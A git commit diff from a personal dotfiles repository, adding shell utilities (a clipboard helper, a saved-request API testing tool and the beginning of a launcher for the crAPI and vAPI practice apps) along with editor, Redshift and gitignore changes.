Organize scripts and clean up dotfiles
Changes: - Added 80+ scripts with organized structure - payloads/ for third-party pentesting tools - pentesting/ for custom security scripts - Daily drivers remain flat for fast access - Converted wes() function to proper script - Removed .sh extensions from pentesting scripts - Cleaned up aliases (removed 31 redundant lines) - Added kanata/, build artifacts to gitignore - Removed old fre.sh scripts and empty a.out - Updated configs: helix, tmux, zsh, ulauncher, redshift Security: All sensitive data excluded via gitignore
This commit is contained in:
parent
322358755f
commit
5b6af65def
99 changed files with 45439 additions and 274 deletions
14
.gitignore
vendored
14
.gitignore
vendored
|
|
@ -23,6 +23,20 @@ ulauncher/.config/ulauncher/ext_preferences/*.db
|
|||
# Git hooks (contain samples)
|
||||
.git/hooks/
|
||||
|
||||
# Kanata keyboard configuration (currently unused, conflicts with WhisperTux)
|
||||
kanata/
|
||||
|
||||
# Build artifacts and Python cache
|
||||
a.out
|
||||
**/__pycache__/
|
||||
**/*.pyc
|
||||
|
||||
# Embedded git repositories (should be submodules instead)
|
||||
scripts/grep_for_osint/
|
||||
|
||||
# Old backups
|
||||
.*.old
|
||||
|
||||
# OS and Editor Files
|
||||
.DS_Store
|
||||
.vscode/
|
||||
|
|
|
|||
111
fancy-fre.sh
111
fancy-fre.sh
|
|
@ -1,111 +0,0 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
TOOLS_FILE="$(dirname "$0")/tools.yaml"
|
||||
LOGFILE="$(dirname "$0")/quick-install.log"
|
||||
|
||||
log() { echo "[INFO] $(date '+%F %T') $*" | tee -a "$LOGFILE"; }
|
||||
log_warn() { echo "[WARN] $(date '+%F %T') $*" | tee -a "$LOGFILE"; }
|
||||
log_err() { echo "[ERROR] $(date '+%F %T') $*" | tee -a "$LOGFILE"; }
|
||||
|
||||
require_tools() {
|
||||
for tool in yq gum; do
|
||||
if ! command -v "$tool" &>/dev/null; then
|
||||
log_err "This script requires '$tool'. Please install it first."
|
||||
exit 1
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
get_tools_for_category() {
|
||||
local category="$1"
|
||||
yq e ".${category}[]" "$TOOLS_FILE"
|
||||
}
|
||||
|
||||
check_and_prepare_install_list() {
|
||||
local category="$1"
|
||||
local install_list=()
|
||||
local ppas_to_add=()
|
||||
|
||||
# Read each item (YAML block) in the category
|
||||
local length
|
||||
length=$(yq e "length(.${category})" "$TOOLS_FILE")
|
||||
for i in $(seq 0 $((length - 1))); do
|
||||
local name ppa
|
||||
name=$(yq e ".${category}[$i].name" "$TOOLS_FILE")
|
||||
ppa=$(yq e ".${category}[$i].ppa // \"\"" "$TOOLS_FILE")
|
||||
|
||||
if ! command -v "$name" &>/dev/null; then
|
||||
install_list+=("$name")
|
||||
if [[ -n "$ppa" ]]; then
|
||||
ppas_to_add+=("$ppa")
|
||||
fi
|
||||
fi
|
||||
done
|
||||
|
||||
# Remove duplicate PPAs
|
||||
mapfile -t ppas_to_add < <(printf '%s\n' "${ppas_to_add[@]}" | sort -u)
|
||||
|
||||
echo "${install_list[*]}"
|
||||
echo "${ppas_to_add[*]}"
|
||||
}
|
||||
|
||||
install_category() {
|
||||
local category="$1"
|
||||
|
||||
log "Processing category: $category"
|
||||
|
||||
read -r -a to_install ppas < <(check_and_prepare_install_list "$category")
|
||||
|
||||
if [[ ${#to_install[@]} -eq 0 ]]; then
|
||||
log "All tools in '$category' are already installed."
|
||||
return
|
||||
fi
|
||||
|
||||
# Show the user what will be installed
|
||||
gum style --foreground 212 --bold "Category: $category"
|
||||
gum style --foreground 99 "The following tools will be installed:"
|
||||
printf '%s\n' "${to_install[@]}" | gum format
|
||||
|
||||
if ! gum confirm "Proceed with installing these tools?"; then
|
||||
log_warn "User declined installation for category: $category"
|
||||
return
|
||||
fi
|
||||
|
||||
# Add PPAs if any
|
||||
if [[ ${#ppas[@]} -gt 0 ]]; then
|
||||
for ppa in "${ppas[@]}"; do
|
||||
log "Adding PPA: $ppa"
|
||||
sudo add-apt-repository -y "$ppa"
|
||||
done
|
||||
sudo apt update
|
||||
fi
|
||||
|
||||
log "Installing packages for category: $category"
|
||||
sudo apt install -y "${to_install[@]}"
|
||||
}
|
||||
|
||||
main() {
|
||||
require_tools
|
||||
log "Starting tool installation from $TOOLS_FILE"
|
||||
|
||||
# Read all top-level categories from tools.yaml
|
||||
mapfile -t categories < <(yq e 'keys | .[]' "$TOOLS_FILE")
|
||||
|
||||
# Let user select categories to install
|
||||
selected_categories=$(gum choose --no-limit --header "Select categories to install:" "${categories[@]}")
|
||||
|
||||
if [[ -z "$selected_categories" ]]; then
|
||||
log_warn "No categories selected. Exiting."
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Loop through selected categories and install
|
||||
while IFS= read -r category; do
|
||||
install_category "$category"
|
||||
done <<< "$selected_categories"
|
||||
|
||||
log "✅ All done."
|
||||
}
|
||||
|
||||
main "$@"
|
||||
66
fre.sh
66
fre.sh
|
|
@ -1,66 +0,0 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
TOOLS_FILE="$(dirname "$0")/tools.yaml"
|
||||
LOGFILE="$(dirname "$0")/install.log"
|
||||
|
||||
log() { echo "[INFO] $(date '+%F %T') $*" | tee -a "$LOGFILE"; }
|
||||
log_warn() { echo "[WARN] $(date '+%F %T') $*" | tee -a "$LOGFILE"; }
|
||||
log_err() { echo "[ERROR] $(date '+%F %T') $*" | tee -a "$LOGFILE"; }
|
||||
|
||||
require_yq() {
|
||||
if ! command -v yq &>/dev/null; then
|
||||
log_err "This script requires 'yq'. Install it via 'sudo apt install yq'."
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
install_category() {
|
||||
local category="$1"
|
||||
log "Processing category: $category"
|
||||
|
||||
# Loop over all items under the category
|
||||
local tools
|
||||
tools=$(yq e ".${category}[]" "$TOOLS_FILE" | sed 's/^- //')
|
||||
|
||||
local install_list=()
|
||||
while IFS= read -r item; do
|
||||
local tool
|
||||
tool=$(yq e ".${category}[] | select(.name == \"$item\") | .name // \"$item\"" "$TOOLS_FILE")
|
||||
local ppa
|
||||
ppa=$(yq e ".${category}[] | select(.name == \"$item\") | .ppa // \"\"" "$TOOLS_FILE")
|
||||
|
||||
if command -v "$tool" &>/dev/null; then
|
||||
log "$tool already installed, skipping."
|
||||
else
|
||||
if [[ -n "$ppa" ]]; then
|
||||
log "Adding PPA: $ppa for $tool"
|
||||
sudo add-apt-repository -y "$ppa"
|
||||
fi
|
||||
install_list+=("$tool")
|
||||
fi
|
||||
done <<< "$tools"
|
||||
|
||||
if [[ ${#install_list[@]} -gt 0 ]]; then
|
||||
log "Installing: ${install_list[*]}"
|
||||
sudo apt update
|
||||
sudo apt install -y "${install_list[@]}"
|
||||
else
|
||||
log "All tools in $category already installed."
|
||||
fi
|
||||
}
|
||||
|
||||
main() {
|
||||
require_yq
|
||||
log "Starting tool installation from $TOOLS_FILE"
|
||||
|
||||
# Define which categories to process
|
||||
local categories=("necessities" "modern" "privacy")
|
||||
for category in "${categories[@]}"; do
|
||||
install_category "$category"
|
||||
done
|
||||
|
||||
log "✅ All done."
|
||||
}
|
||||
|
||||
main "$@"
|
||||
|
|
@ -7,7 +7,6 @@ auto-format = true
|
|||
|
||||
[language-server.pylsp.config.pylsp.plugins.pycodestyle]
|
||||
maxLineLength = 100
|
||||
# ignore = ["E501", "E302"]
|
||||
|
||||
[[language]]
|
||||
name = "bash"
|
||||
|
|
@ -49,12 +48,23 @@ language-servers = ["rust-analyzer"]
|
|||
name = "zig"
|
||||
language-servers = ["zls"]
|
||||
|
||||
[[language]]
|
||||
name = "latex"
|
||||
language-servers = ["texlab"]
|
||||
|
||||
[[language]]
|
||||
name = "powershell"
|
||||
language-servers = ["powershell-editor-services"]
|
||||
|
||||
# add more later when you install their servers
|
||||
[[language]]
|
||||
name = "latex"
|
||||
scope = "source.tex"
|
||||
file-types = ["tex", "sty", "cls", "dtx"]
|
||||
roots = ["main.tex", ".latexmkrc", "body-osr.md"]
|
||||
comment-token = "%"
|
||||
indent = { tab-width = 2, unit = " " }
|
||||
language-server = { command = "texlab" }
|
||||
|
||||
[language.auto-pairs]
|
||||
'(' = ')'
|
||||
'{' = '}'
|
||||
'[' = ']'
|
||||
'"' = '"'
|
||||
'`' = "'"
|
||||
'$' = '$'
|
||||
|
|
|
|||
73
redshift/.config/redshift.conf
Normal file
73
redshift/.config/redshift.conf
Normal file
|
|
@ -0,0 +1,73 @@
|
|||
; Global settings for redshift
|
||||
[redshift]
|
||||
; Set the day and night screen temperatures
|
||||
temp-day=5700
|
||||
temp-night=3200
|
||||
|
||||
; Disable the smooth fade between temperatures when Redshift starts and stops.
|
||||
; 0 will cause an immediate change between screen temperatures.
|
||||
; 1 will gradually apply the new screen temperature over a couple of seconds.
|
||||
fade=1
|
||||
|
||||
; Solar elevation thresholds.
|
||||
; By default, Redshift will use the current elevation of the sun to determine
|
||||
; whether it is daytime, night or in transition (dawn/dusk). When the sun is
|
||||
; above the degrees specified with elevation-high it is considered daytime and
|
||||
; below elevation-low it is considered night.
|
||||
;elevation-high=3
|
||||
;elevation-low=-6
|
||||
|
||||
; Custom dawn/dusk intervals.
|
||||
; Instead of using the solar elevation, the time intervals of dawn and dusk
|
||||
; can be specified manually. The times must be specified as HH:MM in 24-hour
|
||||
; format.
|
||||
;dawn-time=6:00-7:45
|
||||
;dusk-time=18:35-20:15
|
||||
|
||||
; Set the screen brightness. Default is 1.0.
|
||||
;brightness=0.9
|
||||
; It is also possible to use different settings for day and night
|
||||
; since version 1.8.
|
||||
;brightness-day=0.7
|
||||
;brightness-night=0.4
|
||||
; Set the screen gamma (for all colors, or each color channel
|
||||
; individually)
|
||||
gamma=0.8
|
||||
;gamma=0.8:0.7:0.8
|
||||
; This can also be set individually for day and night since
|
||||
; version 1.10.
|
||||
;gamma-day=0.8:0.7:0.8
|
||||
;gamma-night=0.6
|
||||
|
||||
; Set the location-provider: 'geoclue2', 'manual'
|
||||
; type 'redshift -l list' to see possible values.
|
||||
; The location provider settings are in a different section.
|
||||
location-provider=manual
|
||||
|
||||
; Set the adjustment-method: 'randr', 'vidmode'
|
||||
; type 'redshift -m list' to see all possible values.
|
||||
; 'randr' is the preferred method, 'vidmode' is an older API.
|
||||
; but works in some cases when 'randr' does not.
|
||||
; The adjustment method settings are in a different section.
|
||||
# adjustment-method=randr
|
||||
adjustment-method=vidmode
|
||||
|
||||
; Configuration of the location-provider:
|
||||
; type 'redshift -l PROVIDER:help' to see the settings.
|
||||
; ex: 'redshift -l manual:help'
|
||||
; Keep in mind that longitudes west of Greenwich (e.g. the Americas)
|
||||
; are negative numbers.
|
||||
[manual]
|
||||
lat=39.742043
|
||||
lon=-104.991531
|
||||
# lat=48.1
|
||||
# lon=11.6
|
||||
|
||||
; Configuration of the adjustment-method
|
||||
; type 'redshift -m METHOD:help' to see the settings.
|
||||
; ex: 'redshift -m randr:help'
|
||||
; In this example, randr is configured to adjust only screen 0.
|
||||
; Note that the numbering starts from 0, so this is actually the first screen.
|
||||
; If this option is not specified, Redshift will try to adjust _all_ screens.
|
||||
[randr]
|
||||
screen=0
|
||||
31
scripts/.clipboard-helper
Normal file
31
scripts/.clipboard-helper
Normal file
|
|
@ -0,0 +1,31 @@
|
|||
#!/usr/bin/env bash
|
||||
# Clipboard helper functions for scripts
|
||||
# Source this in scripts that need clipboard access
|
||||
|
||||
# Get clipboard content
|
||||
clip_get() {
|
||||
if command -v xsel &>/dev/null; then
|
||||
xsel --output --clipboard
|
||||
elif command -v xclip &>/dev/null; then
|
||||
xclip -selection clipboard -o
|
||||
elif command -v pbpaste &>/dev/null; then
|
||||
pbpaste
|
||||
else
|
||||
echo "Error: No clipboard tool found (install xsel or xclip)" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Set clipboard content
|
||||
clip_set() {
|
||||
if command -v xsel &>/dev/null; then
|
||||
xsel --input --clipboard
|
||||
elif command -v xclip &>/dev/null; then
|
||||
xclip -selection clipboard
|
||||
elif command -v pbcopy &>/dev/null; then
|
||||
pbcopy
|
||||
else
|
||||
echo "Error: No clipboard tool found (install xsel or xclip)" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
443
scripts/api
Executable file
443
scripts/api
Executable file
|
|
@ -0,0 +1,443 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: api
|
||||
# Description: API testing helper with saved requests and response management
|
||||
# Usage: api save login "POST https://api.com/login" -d '{"user":"test"}'
|
||||
# api run login
|
||||
# api list
|
||||
# api history login
|
||||
|
||||
VERSION="1.0.0"
|
||||
API_DIR="$HOME/.api"
|
||||
REQUESTS_DIR="$API_DIR/requests"
|
||||
RESPONSES_DIR="$API_DIR/responses"
|
||||
TOKENS_FILE="$API_DIR/tokens.json"
|
||||
|
||||
# Colors
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly RED='\033[0;31m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Initialize API directory structure
|
||||
init_api() {
|
||||
mkdir -p "$REQUESTS_DIR" "$RESPONSES_DIR"
|
||||
if [[ ! -f "$TOKENS_FILE" ]]; then
|
||||
echo '{}' > "$TOKENS_FILE"
|
||||
fi
|
||||
}
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}api${NC} - API Testing Helper v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " api <command> [args]"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}save NAME CURL_ARGS${NC} Save HTTP request"
|
||||
echo -e " ${CYAN}run NAME [VARS]${NC} Run saved request"
|
||||
echo -e " ${CYAN}list${NC} List saved requests"
|
||||
echo -e " ${CYAN}show NAME${NC} Show request details"
|
||||
echo -e " ${CYAN}delete NAME${NC} Delete saved request"
|
||||
echo -e " ${CYAN}history NAME${NC} Show response history"
|
||||
echo -e " ${CYAN}diff NAME${NC} Diff last two responses"
|
||||
echo -e " ${CYAN}token set KEY VAL${NC} Save auth token"
|
||||
echo -e " ${CYAN}token get KEY${NC} Get auth token"
|
||||
echo -e " ${CYAN}export NAME curl${NC} Export as curl command"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " # Save a login request"
|
||||
echo " api save login \"POST https://api.example.com/login\" \\"
|
||||
echo " -H \"Content-Type: application/json\" \\"
|
||||
echo " -d '{\"user\":\"test\",\"pass\":\"\${PASSWORD}\"}'"
|
||||
echo
|
||||
echo " # Run with variable substitution"
|
||||
echo " api run login PASSWORD=secret123"
|
||||
echo
|
||||
echo " # Save auth token from response"
|
||||
echo " api token set AUTH_TOKEN \"Bearer abc123\""
|
||||
echo
|
||||
echo " # Use token in request"
|
||||
echo " api save profile \"GET https://api.example.com/profile\" \\"
|
||||
echo " -H \"Authorization: \${AUTH_TOKEN}\""
|
||||
echo
|
||||
echo -e "${BOLD}FEATURES:${NC}"
|
||||
echo " - Variable substitution (\${VAR})"
|
||||
echo " - Response history"
|
||||
echo " - Pretty-print JSON"
|
||||
echo " - Diff responses"
|
||||
echo " - Token management"
|
||||
echo
|
||||
echo -e "${BOLD}NOTES:${NC}"
|
||||
echo " Requests: $REQUESTS_DIR"
|
||||
echo " Responses: $RESPONSES_DIR"
|
||||
echo " Tokens: $TOKENS_FILE"
|
||||
}
|
||||
|
||||
# Save request
|
||||
save_request() {
|
||||
local name=$1
|
||||
shift
|
||||
local request_file="$REQUESTS_DIR/$name.sh"
|
||||
|
||||
# Save the curl command
|
||||
cat > "$request_file" << EOF
|
||||
#!/usr/bin/env bash
|
||||
# API Request: $name
|
||||
# Saved: $(date)
|
||||
|
||||
curl -w "\\n\\nStatus: %{http_code}\\nTime: %{time_total}s\\n" \\
|
||||
$@
|
||||
EOF
|
||||
|
||||
chmod +x "$request_file"
|
||||
echo -e "${GREEN}✓${NC} Saved request: $name"
|
||||
echo -e "${CYAN}File:${NC} $request_file"
|
||||
}
|
||||
|
||||
# Run saved request
|
||||
run_request() {
|
||||
local name=$1
|
||||
shift
|
||||
local request_file="$REQUESTS_DIR/$name.sh"
|
||||
|
||||
if [[ ! -f "$request_file" ]]; then
|
||||
echo -e "${RED}Error:${NC} Request not found: $name" >&2
|
||||
echo "Use 'api list' to see available requests" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Parse variables (KEY=VALUE format)
|
||||
declare -A vars
|
||||
for arg in "$@"; do
|
||||
if [[ "$arg" =~ ^([A-Z_]+)=(.+)$ ]]; then
|
||||
vars[${BASH_REMATCH[1]}]="${BASH_REMATCH[2]}"
|
||||
fi
|
||||
done
|
||||
|
||||
# Read request, substitute variables
|
||||
request_content=$(cat "$request_file")
|
||||
for var in "${!vars[@]}"; do
|
||||
request_content="${request_content//\$\{$var\}/${vars[$var]}}"
|
||||
done
|
||||
|
||||
# Also substitute from tokens file
|
||||
if command -v jq &>/dev/null && [[ -f "$TOKENS_FILE" ]]; then
|
||||
while IFS= read -r line; do
|
||||
key=$(echo "$line" | jq -r '.key')
|
||||
val=$(echo "$line" | jq -r '.value')
|
||||
request_content="${request_content//\$\{$key\}/$val}"
|
||||
done < <(jq -c 'to_entries[]' "$TOKENS_FILE")
|
||||
fi
|
||||
|
||||
# Save response with timestamp
|
||||
timestamp=$(date '+%Y%m%d-%H%M%S')
|
||||
response_file="$RESPONSES_DIR/${name}_${timestamp}.txt"
|
||||
|
||||
echo -e "${BOLD}${CYAN}Running: $name${NC}"
|
||||
echo
|
||||
|
||||
# Execute and save response
|
||||
echo "$request_content" | bash | tee "$response_file"
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Response saved: $response_file"
|
||||
|
||||
# Pretty-print JSON if possible
|
||||
if command -v jq &>/dev/null; then
|
||||
if head -1 "$response_file" | jq empty 2>/dev/null; then
|
||||
echo
|
||||
echo -e "${BOLD}${CYAN}JSON Response:${NC}"
|
||||
head -n -3 "$response_file" | jq .
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
# List saved requests
|
||||
list_requests() {
|
||||
if [[ ! -d "$REQUESTS_DIR" ]] || [[ -z "$(ls -A "$REQUESTS_DIR" 2>/dev/null)" ]]; then
|
||||
echo -e "${YELLOW}No saved requests${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Saved Requests:${NC}"
|
||||
echo
|
||||
|
||||
for file in "$REQUESTS_DIR"/*.sh; do
|
||||
name=$(basename "$file" .sh)
|
||||
method=$(grep -oP 'POST|GET|PUT|DELETE|PATCH' "$file" | head -1 || echo "?")
|
||||
url=$(grep -oP 'https?://[^\s"]+' "$file" | head -1 || echo "?")
|
||||
|
||||
printf " %-20s ${CYAN}%-7s${NC} %s\n" "$name" "$method" "$url"
|
||||
done
|
||||
}
|
||||
|
||||
# Show request details
|
||||
show_request() {
|
||||
local name=$1
|
||||
local request_file="$REQUESTS_DIR/$name.sh"
|
||||
|
||||
if [[ ! -f "$request_file" ]]; then
|
||||
echo -e "${RED}Error:${NC} Request not found: $name" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Request: $name${NC}"
|
||||
echo
|
||||
|
||||
# Use bat if available for syntax highlighting
|
||||
if command -v bat &>/dev/null; then
|
||||
bat "$request_file"
|
||||
else
|
||||
cat "$request_file"
|
||||
fi
|
||||
}
|
||||
|
||||
# Delete request
|
||||
delete_request() {
|
||||
local name=$1
|
||||
local request_file="$REQUESTS_DIR/$name.sh"
|
||||
|
||||
if [[ ! -f "$request_file" ]]; then
|
||||
echo -e "${RED}Error:${NC} Request not found: $name" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -n "Delete request '$name'? (y/N) "
|
||||
read -r response
|
||||
if [[ "$response" =~ ^[Yy]$ ]]; then
|
||||
rm "$request_file"
|
||||
echo -e "${GREEN}✓${NC} Deleted: $name"
|
||||
else
|
||||
echo "Cancelled"
|
||||
fi
|
||||
}
|
||||
|
||||
# Show response history
|
||||
show_history() {
|
||||
local name=$1
|
||||
|
||||
responses=$(find "$RESPONSES_DIR" -name "${name}_*.txt" 2>/dev/null | sort -r)
|
||||
|
||||
if [[ -z "$responses" ]]; then
|
||||
echo -e "${YELLOW}No response history for: $name${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Response History: $name${NC}"
|
||||
echo
|
||||
|
||||
echo "$responses" | while read -r file; do
|
||||
timestamp=$(basename "$file" | sed "s/${name}_//" | sed 's/.txt//')
|
||||
status=$(tail -3 "$file" | grep "Status:" | awk '{print $2}')
|
||||
time=$(tail -3 "$file" | grep "Time:" | awk '{print $2}')
|
||||
|
||||
# Color status
|
||||
if [[ "$status" =~ ^2 ]]; then
|
||||
status_colored="${GREEN}$status${NC}"
|
||||
elif [[ "$status" =~ ^4 ]]; then
|
||||
status_colored="${YELLOW}$status${NC}"
|
||||
elif [[ "$status" =~ ^5 ]]; then
|
||||
status_colored="${RED}$status${NC}"
|
||||
else
|
||||
status_colored="$status"
|
||||
fi
|
||||
|
||||
echo -e " $timestamp - Status: $status_colored - Time: $time"
|
||||
done
|
||||
|
||||
echo
|
||||
echo -e "${CYAN}Tip:${NC} Use 'api diff $name' to compare last two responses"
|
||||
}
|
||||
|
||||
# Diff last two responses
|
||||
diff_responses() {
|
||||
local name=$1
|
||||
|
||||
responses=$(find "$RESPONSES_DIR" -name "${name}_*.txt" 2>/dev/null | sort -r | head -2)
|
||||
count=$(echo "$responses" | wc -l)
|
||||
|
||||
if [[ $count -lt 2 ]]; then
|
||||
echo -e "${YELLOW}Need at least 2 responses to diff${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
file1=$(echo "$responses" | sed -n 1p)
|
||||
file2=$(echo "$responses" | sed -n 2p)
|
||||
|
||||
echo -e "${BOLD}${CYAN}Diff: $name${NC}"
|
||||
echo -e "${CYAN}Latest:${NC} $(basename "$file1")"
|
||||
echo -e "${CYAN}Previous:${NC} $(basename "$file2")"
|
||||
echo
|
||||
|
||||
# Remove status/time lines before diff
|
||||
diff -u <(head -n -3 "$file2") <(head -n -3 "$file1") || true
|
||||
}
|
||||
|
||||
# Token management
|
||||
manage_token() {
|
||||
local action=$1
|
||||
shift
|
||||
|
||||
case "$action" in
|
||||
set)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api token set KEY VALUE" >&2
|
||||
exit 1
|
||||
fi
|
||||
key=$1
|
||||
value=$2
|
||||
|
||||
# Update JSON file
|
||||
if command -v jq &>/dev/null; then
|
||||
jq --arg k "$key" --arg v "$value" '. + {($k): $v}' "$TOKENS_FILE" > "$TOKENS_FILE.tmp"
|
||||
mv "$TOKENS_FILE.tmp" "$TOKENS_FILE"
|
||||
echo -e "${GREEN}✓${NC} Token saved: $key"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} jq required for token management" >&2
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
|
||||
get)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api token get KEY" >&2
|
||||
exit 1
|
||||
fi
|
||||
key=$1
|
||||
|
||||
if command -v jq &>/dev/null; then
|
||||
value=$(jq -r ".$key // empty" "$TOKENS_FILE")
|
||||
if [[ -n "$value" ]]; then
|
||||
echo "$value"
|
||||
else
|
||||
echo -e "${YELLOW}Token not found: $key${NC}" >&2
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
;;
|
||||
|
||||
list)
|
||||
if command -v jq &>/dev/null; then
|
||||
echo -e "${BOLD}${CYAN}Saved Tokens:${NC}"
|
||||
jq -r 'keys[]' "$TOKENS_FILE"
|
||||
fi
|
||||
;;
|
||||
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown token action: $action" >&2
|
||||
echo "Use: set, get, list" >&2
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Export request
|
||||
export_request() {
|
||||
local name=$1
|
||||
local format=${2:-curl}
|
||||
local request_file="$REQUESTS_DIR/$name.sh"
|
||||
|
||||
if [[ ! -f "$request_file" ]]; then
|
||||
echo -e "${RED}Error:${NC} Request not found: $name" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
case "$format" in
|
||||
curl)
|
||||
# Extract the curl command
|
||||
grep -A 999 'curl' "$request_file" | grep -v '^#'
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown format: $format" >&2
|
||||
echo "Supported: curl" >&2
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Initialize
|
||||
init_api
|
||||
|
||||
# Parse command
|
||||
if [[ $# -eq 0 ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
case $1 in
|
||||
-h|--help|help)
|
||||
show_help
|
||||
;;
|
||||
save)
|
||||
if [[ $# -lt 3 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api save NAME CURL_ARGS" >&2
|
||||
exit 1
|
||||
fi
|
||||
shift
|
||||
save_request "$@"
|
||||
;;
|
||||
run)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api run NAME [VARS]" >&2
|
||||
exit 1
|
||||
fi
|
||||
shift
|
||||
run_request "$@"
|
||||
;;
|
||||
list|ls)
|
||||
list_requests
|
||||
;;
|
||||
show)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api show NAME" >&2
|
||||
exit 1
|
||||
fi
|
||||
show_request "$2"
|
||||
;;
|
||||
delete|rm)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api delete NAME" >&2
|
||||
exit 1
|
||||
fi
|
||||
delete_request "$2"
|
||||
;;
|
||||
history)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api history NAME" >&2
|
||||
exit 1
|
||||
fi
|
||||
show_history "$2"
|
||||
;;
|
||||
diff)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api diff NAME" >&2
|
||||
exit 1
|
||||
fi
|
||||
diff_responses "$2"
|
||||
;;
|
||||
token)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api token <set|get|list> ..." >&2
|
||||
exit 1
|
||||
fi
|
||||
shift
|
||||
manage_token "$@"
|
||||
;;
|
||||
export)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: api export NAME [FORMAT]" >&2
|
||||
exit 1
|
||||
fi
|
||||
export_request "$2" "${3:-curl}"
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $1" >&2
|
||||
echo "Run 'api --help' for usage" >&2
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
241
scripts/api-lab
Executable file
241
scripts/api-lab
Executable file
|
|
@ -0,0 +1,241 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: api-lab
|
||||
# Description: Quick launcher for API testing vulnerable apps (crAPI and vAPI)
|
||||
# Usage: api-lab start|stop|status|logs
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
LAB_DIR="$HOME/api-lab"
|
||||
CRAPI_DIR="$LAB_DIR/crapi"
|
||||
VAPI_DIR="$LAB_DIR/vapi"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}api-lab${NC} - API Testing Lab Manager v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " api-lab <command> [app]"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}start [app]${NC} Start lab containers (crapi, vapi, or both)"
|
||||
echo -e " ${CYAN}stop [app]${NC} Stop lab containers"
|
||||
echo -e " ${CYAN}status${NC} Show running containers"
|
||||
echo -e " ${CYAN}logs [app]${NC} Show container logs"
|
||||
echo -e " ${CYAN}setup${NC} Initial lab setup (clone repos)"
|
||||
echo
|
||||
echo -e "${BOLD}APPS:${NC}"
|
||||
echo -e " ${YELLOW}crapi${NC} - Completely Ridiculous API (OWASP)"
|
||||
echo -e " ${YELLOW}vapi${NC} - Vulnerable API"
|
||||
echo -e " ${YELLOW}both${NC} - Start/stop both apps (default)"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " api-lab start # Start both labs"
|
||||
echo " api-lab start crapi # Start only crAPI"
|
||||
echo " api-lab stop # Stop both labs"
|
||||
echo " api-lab status # Check what's running"
|
||||
echo " api-lab logs vapi # View vAPI logs"
|
||||
echo
|
||||
echo -e "${BOLD}URLS:${NC}"
|
||||
echo " crAPI: http://127.0.0.1:8888"
|
||||
echo " Mailhog: http://127.0.0.1:8025"
|
||||
echo " vAPI: http://127.0.0.1/vapi"
|
||||
}
|
||||
|
||||
# Check if docker is available
|
||||
check_docker() {
|
||||
if ! command -v docker &>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} Docker not installed"
|
